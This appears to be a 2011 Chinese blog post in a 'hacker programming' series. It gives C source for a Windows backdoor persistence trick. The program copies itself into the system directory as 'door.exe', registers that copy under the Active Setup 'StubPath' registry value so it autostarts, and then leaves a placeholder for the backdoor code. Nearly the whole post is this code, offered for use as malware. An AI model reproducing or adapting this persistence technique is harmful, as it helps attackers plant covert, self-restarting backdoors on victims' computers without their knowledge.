注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

熊猫正正的博客

熊猫正正的天空

 
 
 

日志

 
 

黑客编程(十八)ActiveX自启动  

2011-07-06 20:25:48|  分类: C/C++ |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
#include "stdafx.h"
#include <stdio.h>
#include <windows.h>

//用于修改字符串类型键值
void CreateStringReg(HKEY hRoot,char *szSubKey,char *ValueName,char *Data)
{
HKEY hKey;
//打开注册表键,不存在则创建它
long lRet = RegCreateKeyEx(hRoot,szSubKey,0,NULL,REG_OPTION_NON_VOLATILE,\
KEY_ALL_ACCESS,NULL,&hKey,NULL);
if(lRet != ERROR_SUCCESS)
{
printf("error no RegCreateKeyEx %s\n",szSubKey);
return ;
}

//修改注册表键值,没有则创建它
lRet = RegSetValueEx(hKey,ValueName,0,REG_SZ,(BYTE*)Data,strlen(Data));
if(lRet != ERROR_SUCCESS)
{
printf("error no RegSetValueEx %s\n",ValueName);
return ;
}

RegCloseKey(hKey);
}



int main(int argc, char* argv[])
{
HKEY hKey;
DWORD dwDpt = REG_OPENED_EXISTING_KEY;
//打开HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\
//{E92B03AB-A707-11d2-9CBD-0000F87A369H}
long lRet = RegOpenKeyEx(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{E92B03AB-A707-11d2-9CBD-0000F87A369H}",REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,&hKey);
//不存在则,父子自身文件到系统目录中,加载ActiveX启动
if(lRet != ERROR_SUCCESS)
{
char SelfFile[MAX_PATH];
char SystemPath[512];
//得到系统目录路径
GetSystemDirectory(SystemPath,sizeof(SystemPath));
strcat(SystemPath,"\\door.exe");
//得到自身程序路径
GetModuleFileName(NULL,SelfFile,MAX_PATH);
//复制文件
CopyFile(SelfFile,SystemPath,true);
//加载ActiveX启动,一个自定义修改注册表的函数,前面已经多次用到
CreateStringReg(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{E92B03AB-A707-11d2-9CBD-0000F87A369H}","StubPath",SystemPath);

return 0;
}

//否则删除HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{E92B03AB-A707-11d2-9CBD-0000F87A369H}
RegDeleteKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Active Setup\\Installed Components\\{E92B03AB-A707-11d2-9CBD-0000F87A369H}");

//.....后门代码
return 0;
}

  评论这张
 
阅读(126)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017